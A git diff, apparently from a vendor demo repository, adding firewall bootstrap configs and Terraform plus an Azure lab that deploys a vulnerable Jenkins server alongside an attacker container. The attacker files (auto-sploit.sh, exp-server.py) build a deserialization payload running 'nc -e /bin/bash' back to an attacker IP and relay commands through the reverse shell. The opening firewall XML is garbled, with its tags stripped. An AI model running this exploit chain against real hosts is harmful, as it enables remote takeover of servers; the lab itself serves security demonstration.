+ group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + sha1 + + + aes-128-cbc + + + + 3600 + + group2 + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + no + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + 192.168.11.1 + + + None + + + no + any + 2 + + ethernet1/1 + 10 + 0.0.0.0/0 + + + + + + + 192.168.21.1 + + + None + + + no + any + 2 + + ethernet1/2 + 10 + 10.0.0.0/8 + + + + + + + + + + + + + + + + + + yes + yes + no + yes + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + America/New_York + + yes + yes + + vmseries-fw2 + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDSWphVDNFbnRlRU80cHFIM09aRnFIOFB6ekFnZmtnNG1yYnNpaWZyZzZDTDJqNjFmbWhIRTFVdjlZalBVRjhJMUhrei9lWGpuMno4Z2ltOEdVcFR1WDExUXhiSmNsM1NLYU51VGxWWVA0VnJvSmJDU3VBVStDdzcyT3haMTN3UVFXa0JzaDRnV05iZ3dnSU1TcURHckYvSlZMV2JxemZDeWFEVmltVVRqdFN4L0NSVDUwbEpqdGR4b2pVdm5mUHZnWXQrVVNBNVpqSExPMDJvY1hZcXBhSEp3UnN5OUo2NGtVcEluRXBKYlFqbXZhajJieVIzb1ZkYzVuVlNsREtvWVlzd1ZNUlZxUXQwNDFYdFhhSm9yZm9SYnF1dmd6Vk1sN2w5V0JWQ2RYOE8rbm9iSHlMT1lZdVBqU05IN1FKZVNPeDJkd1N2ZG9zRmJmZ3ZpUHRjT1QgbXJtLWVhc3R1cy1rZXk= + + + yes + yes + no + yes + + + vmseries-fw2 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + + + + + + + ethernet1/2 + + + + + + + + + 1001 + + + + + + + + + + 2001 + + + + + + + + + + 2002 + + + + + + + + + + 1002 + + + + + + + + + + + + + + + trust-zone + + + untrust-zone + + + any + + + any + + + any + + + any + + + ssh + + + tcp-1001 + tcp-1002 + tcp-2001 + tcp-2002 + + + any + + allow + yes + + + + trust-zone + + + trust-zone + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + untrust-zone + + + trust-zone + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + deny + + + + + + + + + + ethernet1/1 + + + + + untrust-zone + + + trust-zone + + + any + + + any + + any + + + + untrust-zone + + + untrust-zone + + + any + + + untrust-fw2 + + tcp-1001 + + + + ethernet1/2 + + + + + 22 + 10.1.0.4 + + + + + untrust-zone + + + untrust-zone + + + any + + + untrust-fw2 + + tcp-1002 + + + + ethernet1/2 + + + + + 22 + 10.1.1.4 + + + + + untrust-zone + + + untrust-zone + + + any + + + untrust-fw2 + + tcp-2001 + + + + ethernet1/2 + + + + + 22 + 10.2.0.4 + + + + + untrust-zone + + + untrust-zone + + + any + + + untrust-fw2 + + tcp-2002 + + + + ethernet1/2 + + + + + 22 + 10.2.1.4 + + + + + + + + allow + no + yes + + + deny + no + yes + + + + + + + + ethernet1/1 + ethernet1/2 + + + +
+ + 192.168.11.4 + +
+ + + color6 + + + color13 + + +
+
+
+
+
diff --git a/aws/transitgateway-demo-v2/bootstrap_files/fw2/init-cfg.txt b/aws/transitgateway-demo-v2/bootstrap_files/fw2/init-cfg.txt new file mode 100644 index 00000000..2fd77546 --- /dev/null +++ b/aws/transitgateway-demo-v2/bootstrap_files/fw2/init-cfg.txt @@ -0,0 +1,18 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname=vmseries-fw2 +panorama-server= +panorama-server-2= +tplname= +dgname= +dns-primary= +dns-secondary= +op-command-modes=mgmt-interface-swap +dhcp-send-hostname=yes +dhcp-send-client-id=yes +dhcp-accept-server-hostname=no +dhcp-accept-server-domain=yes diff --git a/aws/transitgateway-demo-v2/create_s3_bootstrap.tf b/aws/transitgateway-demo-v2/create_s3_bootstrap.tf new file mode 100644 index 00000000..a4d0a15a --- /dev/null +++ b/aws/transitgateway-demo-v2/create_s3_bootstrap.tf @@ -0,0 +1,161 @@ +#************************************************************************************ +# CREATE 2 S3 BUCKETS FOR FW1 & FW2 +#************************************************************************************ +resource "random_string" "randomstring" { + length = 25 + min_lower = 15 + min_numeric = 10 + special = false +} + +resource "aws_s3_bucket" "bootstrap_bucket_fw1" { + bucket = "${join("", list(var.bootstrap_s3bucket1_create, "-", random_string.randomstring.result))}" + acl = "private" + force_destroy = true +} + +resource "aws_s3_bucket" "bootstrap_bucket_fw2" { + bucket = "${join("", list(var.bootstrap_s3bucket2_create, "-", random_string.randomstring.result))}" + acl = "private" + force_destroy = true +} + + +#************************************************************************************ +# CREATE FW1 DIRECTORIES & UPLOAD FILES FROM /bootstrap_files/fw1 DIRECTORY +#************************************************************************************ +resource "aws_s3_bucket_object" "bootstrap_xml" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw1.id}" + acl = "private" + key = "config/bootstrap.xml" + source = "bootstrap_files/fw1/bootstrap.xml" +} + +resource "aws_s3_bucket_object" "init-cft_txt" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw1.id}" + acl = "private" + key = "config/init-cfg.txt" + source = "bootstrap_files/fw1/init-cfg.txt" +} + +resource "aws_s3_bucket_object" "software" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw1.id}" + acl = "private" + key = "software/" + source = "/dev/null" +} + +resource "aws_s3_bucket_object" "license" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw1.id}" + acl = "private" + key = "license/authcodes" + source = "bootstrap_files/fw1/authcodes" +} + +resource "aws_s3_bucket_object" "content" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw1.id}" + acl = "private" + key = "content/" + source = "/dev/null" +} + + +#************************************************************************************ +# CREATE FW2 DIRECTORIES & UPLOAD FILES FROM /bootstrap_files/fw2 DIRECTORY +#************************************************************************************ +resource "aws_s3_bucket_object" "bootstrap_xml2" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw2.id}" + acl = "private" + key = "config/bootstrap.xml" + source = "bootstrap_files/fw2/bootstrap.xml" +} + +resource "aws_s3_bucket_object" "init-cft_txt2" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw2.id}" + acl = "private" + key = "config/init-cfg.txt" + source = "bootstrap_files/fw2/init-cfg.txt" +} + +resource "aws_s3_bucket_object" "software2" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw2.id}" + acl = "private" + key = "software/" + source = "/dev/null" +} + +resource "aws_s3_bucket_object" "license2" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw2.id}" + acl = "private" + key = "license/authcodes" + source = "bootstrap_files/fw2/authcodes" +} + +resource "aws_s3_bucket_object" "content2" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw2.id}" + acl = "private" + key = "content/" + source = "/dev/null" +} + + +#************************************************************************************ +# CREATE & ASSIGN IAM ROLE, POLICY, & INSTANCE PROFILE +#************************************************************************************ +resource "aws_iam_role" "bootstrap_role" { + name = "ngfw_bootstrap_role123" + + assume_role_policy = < This skillet deploys the Security Framework Azure Jenkins Exploit Protection environment. The template deploy the Following: - Azure VPC's, Route Tables, Subnets, Availability Zones, Load Balancers and Native Security tools WAF and Security Groups. + Azure VNETS's, Route Tables, Subnets, Availability Zones, Load Balancers and Native Security tools WAF and Network Security Groups. The Template will also deploy Palo Alto Networks Firewall with security posture. - # type of skillet (panos or panorama or template or terraform) type: python3 @@ -17,14 +16,14 @@ extends: # Labels allow grouping and type specific options and are generally only used in advanced cases labels: - collection: Jenkins Security Framework + collection: Azure Jenkins Security Framework # variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc # may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application variables: - name: username description: FW Username - default: admin + default: panadmin type_hint: text - name: password description: FW Password @@ -34,7 +33,77 @@ variables: description: Azure Resource Group default: cloud-security-framework-changeme type_hint: text - + - name: azure_region + description: Azure Region + default: centralus + type_hint: dropdown + dd_list: + - key: "West US" + value: "westus" + - key: "West US 2" + value: "westus2" + - key: "West Central US" + value: "westcentralus" + - key: "East US" + value: "eastus" + - key: "East US 2" + value: "eastus2" + - key: "Central US" + value: "centralus" + - key: "North Central US" + value: "northcentralus" + - key: "South Central US" + value: "southcentralus" + - key: "Canada Central" + value: "canadacentral" + - key: "Canada East" + value: "canadaeast" + - key: "UK West" + value: "ukwest" + - key: "UK South" + value: "uksouth" + - key: "North Europe" + value: "northeurope" + - key: "West Europe" + value: "westeurope" + - key: "Australia East" + value: "australiaeast" + - key: "Australia Southeast" + value: "australiasoutheast" + - key: "Australia Central" + value: "australiacentral" + - key: "Australia Central 2" + value: "australiacentral2" + - key: "East Asia" + value: "eastasia" + - key: "South East Asia" + value: "southeastasia" + - key: "Korea Central" + value: "koreacentral" + - key: "Korea South" + value: "koreasouth" + - key: "Japan West" + value: "japanwest" + - key: "Japan East" + value: "japaneast" + - key: "South India" + value: "southindia" + - key: "Central India" + value: "centralindia" + - key: "West India" + value: "westindia" + - key: "Brazil South" + value: "brazilsouth" + - key: "France Central" + value: "francecentral" + - key: "France South" + value: "francesouth" + # - name: azure_region + # description: Azure Region + # default: centralus + # type_hint: text + + # Snippets is an ordered list of configuration xml fragments that will be pushed to the PAN-OS NGFW. The xpath # determines where in the configuration hierarchy the xml fragment will be set. 'file' indicates the name of the file # to load and parse. Jinja2 style variables will be variable interpolated using the values of the 'variables' defined @@ -42,4 +111,3 @@ variables: snippets: - name: script file: ../../deploy.py - diff --git a/azure/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml b/azure/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml index 597951fa..e96eb3c6 100644 --- a/azure/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml +++ b/azure/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml @@ -15,7 +15,7 @@ extends: # Labels allow grouping and type specific options and are generally only used in advanced cases labels: - collection: Jenkins Security Framework + collection: Azure Jenkins Security Framework # variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc # may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application diff --git a/azure/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml b/azure/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml index 96e2aa59..dd64f7ff 100644 --- a/azure/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml +++ b/azure/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml @@ -17,7 +17,7 @@ extends: # Labels allow grouping and type specific options and are generally only used in advanced cases labels: - collection: Jenkins Security Framework + collection: Azure Jenkins Security Framework # variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc # may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application diff --git a/azure/Jenkins_proj-master/.pan-cnc/login/.meta-cnc.yaml b/azure/Jenkins_proj-master/.pan-cnc/login/.meta-cnc.yaml index e6cce0e6..8e3c95eb 100644 --- a/azure/Jenkins_proj-master/.pan-cnc/login/.meta-cnc.yaml +++ b/azure/Jenkins_proj-master/.pan-cnc/login/.meta-cnc.yaml @@ -1,5 +1,5 @@ name: azure_login -label: Azure Login +label: Azure Login (Pre-Deployment Step) description: | This skillet will log into Azure. You will be prompted to follow a link and enter a device-code in your browser. @@ -14,7 +14,7 @@ extends: # Labels allow grouping and type specific options and are generally only used in advanced cases labels: - collection: Jenkins Security Framework + collection: Azure Jenkins Security Framework # variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc # may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application @@ -30,4 +30,4 @@ variables: # in the 'variables' section. snippets: - name: script - file: ../../azure_login.py \ No newline at end of file + file: ../../azure_login.py diff --git a/azure/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml b/azure/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml index 189ed790..26e7925e 100644 --- a/azure/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml +++ b/azure/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml @@ -4,7 +4,6 @@ label: Azure Jenkins Security Framework Step 3 Send Command description: > This Skillet will allow you to interact and send commands to the exploited Jenkins system. - # type of skillet (panos or panorama or template or terraform) type: python3 @@ -15,7 +14,7 @@ extends: # Labels allow grouping and type specific options and are generally only used in advanced cases labels: - collection: Jenkins Security Framework + collection: Azure Jenkins Security Framework # variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc # may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application diff --git a/azure/Jenkins_proj-master/WebInBootstrap/terraform.tfvars b/azure/Jenkins_proj-master/WebInBootstrap/terraform.tfvars index 18e2a06e..9f03abf8 100644 --- a/azure/Jenkins_proj-master/WebInBootstrap/terraform.tfvars +++ b/azure/Jenkins_proj-master/WebInBootstrap/terraform.tfvars @@ -1,3 +1,3 @@ RG_Name = "" -Azure_Region = "central us" +Azure_Region = "" diff --git a/azure/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml b/azure/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml index adf9834a..e528f907 100644 --- a/azure/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml +++ b/azure/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml @@ -741,13 +741,6 @@ - - - - download-and-install - - - diff --git a/azure/Jenkins_proj-master/WebInDeploy/loadbalancers.tf b/azure/Jenkins_proj-master/WebInDeploy/loadbalancers.tf index 810c5293..14f0338f 100644 --- a/azure/Jenkins_proj-master/WebInDeploy/loadbalancers.tf +++ b/azure/Jenkins_proj-master/WebInDeploy/loadbalancers.tf @@ -53,6 +53,7 @@ resource "azurerm_application_gateway" "appgw1" { backend_address_pool_name = "webservers" backend_http_settings_name = "http" } + depends_on = ["data.azurerm_resource_group.resourcegroup"] } #### AppGW2 #### @@ -108,6 +109,7 @@ resource "azurerm_application_gateway" "appgw2" { backend_address_pool_name = "firewalls" backend_http_settings_name = "http" } + depends_on = ["data.azurerm_resource_group.resourcegroup"] } #### INTERNAL APP FACING LOAD BALANCER #### @@ -150,4 +152,4 @@ resource "azurerm_lb_rule" "webservers" { frontend_ip_configuration_name = "weblbip" backend_address_pool_id = "${azurerm_lb_backend_address_pool.webservers.id}" probe_id = "${azurerm_lb_probe.webservers.id}" -} \ No newline at end of file +} diff --git a/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker1.sh b/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker1.sh index 3bf0b075..4cabd5ed 100644 --- a/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker1.sh +++ b/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker1.sh @@ -4,10 +4,10 @@ apt-get update apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes pip3 install docker-compose cd /var/tmp -wget https://raw.githubusercontent.com/nembery/terraform-1/master/aws/Jenkins_proj-master/.temp/Dockerfile -wget https://raw.githubusercontent.com/nembery/terraform-1/master/aws/Jenkins_proj-master/.temp/docker-compose.yml -wget https://jff-jenkins-attack.s3-us-west-2.amazonaws.com/run.sh -wget https://jff-jenkins-attack.s3-us-west-2.amazonaws.com/auto-sploit.sh -wget https://raw.githubusercontent.com/nembery/terraform-1/master/aws/Jenkins_proj-master/exp-server.py +wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/Dockerfile +wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/docker-compose.yml +wget https://github.com/wwce/terraform/blob/master/azure/Jenkins_proj-master/attacker/run.sh +wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/auto-sploit.sh +wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/exp-server.py docker-compose build -docker-compose up -d \ No newline at end of file +docker-compose up -d diff --git a/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh b/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh index 55324851..bb37c3e5 100644 --- a/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh +++ b/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh @@ -7,11 +7,11 @@ cd /var/tmp echo "version: '3'" > docker-compose.yml echo "services:" >> docker-compose.yml echo " jenkins:" >> docker-compose.yml -echo " image: pglynn/jenkins:version1.0" >> docker-compose.yml +echo " image: pglynn/jenkins:latest" >> docker-compose.yml echo " environment:" >> docker-compose.yml echo " JAVA_OPTS: \"-Djava.awt.headless=true\"" >> docker-compose.yml echo " JAVA_OPTS: \"-Djenkins.install.runSetupWizard=false\"" >> docker-compose.yml echo " ports:" >> docker-compose.yml echo " - \"50000:50000\"" >> docker-compose.yml echo " - \"8080:8080\"" >> docker-compose.yml -docker-compose up -d \ No newline at end of file +docker-compose up -d diff --git a/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver1.sh b/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver1.sh index afb0acd2..17b352c5 100644 --- a/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver1.sh +++ b/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver1.sh @@ -4,8 +4,8 @@ apt-get update apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes pip3 install docker-compose cd /var/tmp -wget https://jenkins-test-vuln.s3-us-west-2.amazonaws.com/Dockerfile -wget https://jenkins-test-vuln.s3-us-west-2.amazonaws.com/docker-compose.yml -wget https://jenkins-test-vuln.s3-us-west-2.amazonaws.com/jenkins.sh +wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/Dockerfile +wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/docker-compose.yml +wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/jenkins.sh docker-compose build -docker-compose up -d \ No newline at end of file +docker-compose up -d diff --git a/azure/Jenkins_proj-master/WebInDeploy/terraform.tfvars b/azure/Jenkins_proj-master/WebInDeploy/terraform.tfvars index bb60d8f1..f56aa41c 100644 --- a/azure/Jenkins_proj-master/WebInDeploy/terraform.tfvars +++ b/azure/Jenkins_proj-master/WebInDeploy/terraform.tfvars @@ -1,6 +1,6 @@ Attack_RG_Name = "" -Azure_Region = "central us" +Azure_Region = "" Admin_Username = "" @@ -44,4 +44,4 @@ WebLB_IP = "10.0.4.10" Web_IP = "10.0.4.50" -Attack_IP = "10.1.1.50" \ No newline at end of file +Attack_IP = "10.1.1.50" diff --git a/azure/Jenkins_proj-master/WebInFWConf/firewallconfig.tf b/azure/Jenkins_proj-master/WebInFWConf/firewallconfig.tf index 6ba878ef..da110808 100644 --- a/azure/Jenkins_proj-master/WebInFWConf/firewallconfig.tf +++ b/azure/Jenkins_proj-master/WebInFWConf/firewallconfig.tf @@ -134,7 +134,7 @@ resource "panos_security_policies" "security_policies" { hip_profiles = ["any"] destination_zones = ["${panos_zone.zone_trust.name}", "${panos_zone.zone_untrust.name}"] destination_addresses = ["any"] - applications = ["web-browsing", "jenkins"] + applications = ["web-browsing", "jenkins", "windows-azure-base"] services = ["service-http", "${panos_service_object.so_81.name}"] categories = ["any"] group = "Inbound" @@ -206,4 +206,4 @@ resource "panos_static_route_ipv4" "internal" { interface = "${panos_ethernet_interface.eth1_2.name}" destination = "${var.Web_Subnet_CIDR}" next_hop = "${var.FW_Internal_GW}" -} \ No newline at end of file +} diff --git a/azure/Jenkins_proj-master/attacker/Dockerfile b/azure/Jenkins_proj-master/attacker/Dockerfile new file mode 100644 index 00000000..e6123ab4 --- /dev/null +++ b/azure/Jenkins_proj-master/attacker/Dockerfile @@ -0,0 +1,42 @@ +FROM openjdk:8-jdk + +MAINTAINER jamie-b + +RUN apt-get update && apt-get install -y git curl wget netcat nmap net-tools sudo python3 python3-pip && rm -rf /var/lib/apt/lists/* + +RUN echo 'root:paloalto' | chpasswd + +ENV TINI_VERSION v0.14.0 +ADD https://github.com/wwce/terraform/blob/master/azure/Jenkins_proj-master/jenkins/tini?raw=true /bin/tini +RUN chmod +x /bin/tini + +RUN set -ex \ + && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/commons-beanutils-1.8.3.jar -O ~/commons-beanutils-1.8.3.jar -q --progress=bar:force:noscroll --show-progress \ + && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/commons-collections-3.2.1.jar -O ~/commons-collections-3.2.1.jar -q --progress=bar:force:noscroll --show-progress \ + && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/commons-lang-2.6.jar -O ~/commons-lang-2.6.jar -q --progress=bar:force:noscroll --show-progress \ + && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/commons-logging-1.2.jar -O ~/commons-logging-1.2.jar -q --progress=bar:force:noscroll --show-progress \ + && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/ezmorph-1.0.6.jar -O ~/ezmorph-1.0.6.jar -q --progress=bar:force:noscroll --show-progress \ + && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/json-lib-2.4-jenkins-2.jar -O ~/json-lib-2.4-jenkins-2.jar -q --progress=bar:force:noscroll --show-progress \ + && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/payload.jar -O ~/payload.jar -q --progress=bar:force:noscroll --show-progress \ + && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/exploit.py -O ~/exploit.py -q --progress=bar:force:noscroll --show-progress + +EXPOSE 443 5000 + +RUN pip3 install requests flask pexpect + +COPY run.sh /usr/local/bin/run.sh +COPY exp-server.py /root/exp-server.py + +RUN chmod +x /usr/local/bin/run.sh + +COPY auto-sploit.sh /root/auto-sploit.sh + +RUN chmod +x /root/auto-sploit.sh + +USER root + +ENTRYPOINT ["/bin/tini", "--"] +ENV FLASK_APP=/root/exp-server.py + +# CMD ["/usr/local/bin/run.sh"] +CMD ["/usr/local/bin/flask", "run", "--host=0.0.0.0"] diff --git a/azure/Jenkins_proj-master/attacker/auto-sploit.sh b/azure/Jenkins_proj-master/attacker/auto-sploit.sh new file mode 100644 index 00000000..97c6dc3d --- /dev/null +++ b/azure/Jenkins_proj-master/attacker/auto-sploit.sh @@ -0,0 +1,31 @@ +#! /bin/bash + +echo +echo "*******************************************************************" +echo +echo "Open another terminal window and run a netcat listener: nc -lvp 443" +echo +echo "Run the following command to spawn a shell once the reverse connection establishes:" +echo +echo "python -c 'import pty; pty.spawn(\"/bin/bash\")'" +echo +read -n 1 -s -r -p "Once the above is complete - press any key to continue" + +echo +echo "Enter Attacker IP Address:" +echo + +read attacker + +echo "Creating Payload with IP address" $attacker +echo + +java -jar payload.jar payload.ser "nc -e /bin/bash $attacker 443" + +echo "Payload successfully created and saved as 'payload.ser'" +echo + +echo "Executing exploit..." +echo + +python3 exploit.py diff --git a/azure/Jenkins_proj-master/attacker/docker-compose.yml b/azure/Jenkins_proj-master/attacker/docker-compose.yml new file mode 100644 index 00000000..02cdb71b --- /dev/null +++ b/azure/Jenkins_proj-master/attacker/docker-compose.yml @@ -0,0 +1,8 @@ +version: '3' +services: + attacker: + build: . + container_name: attacker + ports: + - "443:443" + - "5000:5000" diff --git a/azure/Jenkins_proj-master/attacker/exp-server.py b/azure/Jenkins_proj-master/attacker/exp-server.py new file mode 100644 index 00000000..19a4a77b --- /dev/null +++ b/azure/Jenkins_proj-master/attacker/exp-server.py @@ -0,0 +1,175 @@ +# Copyright (c) 2018, Palo Alto Networks +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +""" +Palo Alto Networks - demo-launcher +Super simple App to expose a RESTful API to launch a couple of scripts +This software is provided without support, warranty, or guarantee. +Use at your own risk. +""" + +import pexpect +from flask import Flask +from flask import request +import os +import time + +app = Flask(__name__) + + +@app.route("/") +def hello(): + return "Good Day!" + + +@app.route("/launch", methods=['POST']) +def launch_sploit(): + """ + Accepts a JSON payload with the following structure: + { + "target": "nlb-something.fqdn.com", + "attacker": "1.2.3.4" + } + If the payload parses correctly, then launch a reverse shell listener using pexpect.spawn + then spawn the auto-sploit.sh tool and enter the target and attacker info again using pexpect + :return: Simple String response for now + """ + if request.is_json: + print(request.data) + payload = request.get_json() + print(request.mimetype) + print(request.content_type) + print(request.accept_mimetypes) + print(payload) + print(type(payload)) + target_ip = payload.get('target', '') + attacker_ip = payload.get('attacker', '') + if target_ip == "" or attacker_ip == "": + print('Payload is all wrong!') + print(request.payload) + return 'ERROR' + + exe = '/root/auto-sploit.sh' + if not os.path.exists(exe): + return 500, 'launch script does not exist' + + print('Launching auto-sploit.sh') + child = pexpect.spawn('/root/auto-sploit.sh') + child.delaybeforesend = 2 + found_index = child.expect(['press any key to continue', pexpect.EOF, pexpect.TIMEOUT]) + if found_index == 0: + print('launching listener process') + _launch_listener() + child.send('\n') + else: + return 'ERROR - Could not press key to continue' + + found_index = child.expect(['Enter Attacker IP Address', pexpect.EOF, pexpect.TIMEOUT]) + if found_index == 0: + print('Sending attacker ip :::' + attacker_ip + ':::') + child.sendline(attacker_ip) + else: + return 'ERROR - Could not enter attacker IP' + + found_index = child.expect(['Enter Jenkins Target IP Address', pexpect.EOF, pexpect.TIMEOUT]) + if found_index == 0: + print(child.before) + print('Sending target ip') + child.sendline(target_ip) + else: + print(child.before) + return 'ERROR - Could not enter jenkins IP' + + found_index = child.expect(['pwn', pexpect.EOF, pexpect.TIMEOUT]) + if found_index == 0: + print('PWN') + print(child) + time.sleep(2) + return 'SUCCESS - auto-sploit launched!' + + else: + return 'No Bueno - No JSON payload detected' + + +@app.route("/send", methods=['POST']) +def send_cmd(): + if request.is_json: + data = request.get_json() + cli = data.get('cli', '') + if cli == '': + return 'No Bueno - Invalid JSON payload' + + if 'listener' in app.config: + print('We have a listener already up!') + listener = app.config.get('listener', '') + if not hasattr(listener, 'isalive') or not listener.isalive(): + return 'No Bueno - Listener does not appear to be active' + + print('Sending initial command to see where we are!') + listener.sendline('echo $SHLVL\n') + found_index = listener.expect(['1', 'jenkins@', 'root@', pexpect.EOF, pexpect.TIMEOUT]) + print(found_index) + if found_index == 0: + # no prompt yet + print('Great, trying to get a prompt now') + listener.sendline("python -c 'import pty; pty.spawn(\"/bin/bash\")'") + + if found_index > 2: + print(listener.before) + return 'Someting is wrong with the listener connection!' + + # listener.sendline(cli) + # print(listener) + found_index = listener.expect(['jenkins@.*$', 'root@.*#', pexpect.EOF, pexpect.TIMEOUT]) + print('Found index is now: ' + str(found_index)) + if found_index > 1: + print(listener) + return 'Someting is wrong with the listener connection!' + listener.sendline(cli) + found_index = listener.expect(['jenkins@.*$', 'root@.*#', pexpect.EOF, pexpect.TIMEOUT]) + print('Found index after cli is now: ' + str(found_index)) + if found_index > 1: + print(listener) + return 'Someting is wrong with the listener connection!' + print(listener) + return listener.before + + else: + return 'NOPE' + else: + return 'NOWAYJOSE' + + +def _launch_listener(): + if 'listener' not in app.config: + listener = pexpect.spawn('nc -lvp 443') + found_index = listener.expect(['listening', pexpect.EOF, pexpect.TIMEOUT]) + if found_index != 0: + return False + app.config['listener'] = listener + print('Launched and ready to rock') + return True + else: + listener = app.config['listener'] + if hasattr(listener, 'isalive') and listener.isalive(): + return True + else: + listener = pexpect.spawn('nc -lvp 443') + found_index = listener.expect(['listening', pexpect.EOF, pexpect.TIMEOUT]) + if found_index != 0: + return False + app.config['listener'] = listener + return True + + diff --git a/azure/Jenkins_proj-master/attacker/run.sh b/azure/Jenkins_proj-master/attacker/run.sh new file mode 100644 index 00000000..bc9b9de7 --- /dev/null +++ b/azure/Jenkins_proj-master/attacker/run.sh @@ -0,0 +1,11 @@ +#! /bin/bash -e + +# Running nc on an unexposed port to keep the container up + +if [[ $# -lt 1 ]] || [[ "$1" == "--"* ]]; then + + exec nc -l -p 56789 "$@" + +fi + +exec "$@" diff --git a/azure/Jenkins_proj-master/azure_login.py b/azure/Jenkins_proj-master/azure_login.py index b21948f2..bbe85a41 100644 --- a/azure/Jenkins_proj-master/azure_login.py +++ b/azure/Jenkins_proj-master/azure_login.py @@ -7,3 +7,4 @@ print('Logging in to Azure using device code') get_default_cli().invoke(['login', "--use-device-code"], out_file=sys.stdout) +pass \ No newline at end of file diff --git a/azure/Jenkins_proj-master/deploy-v2.html 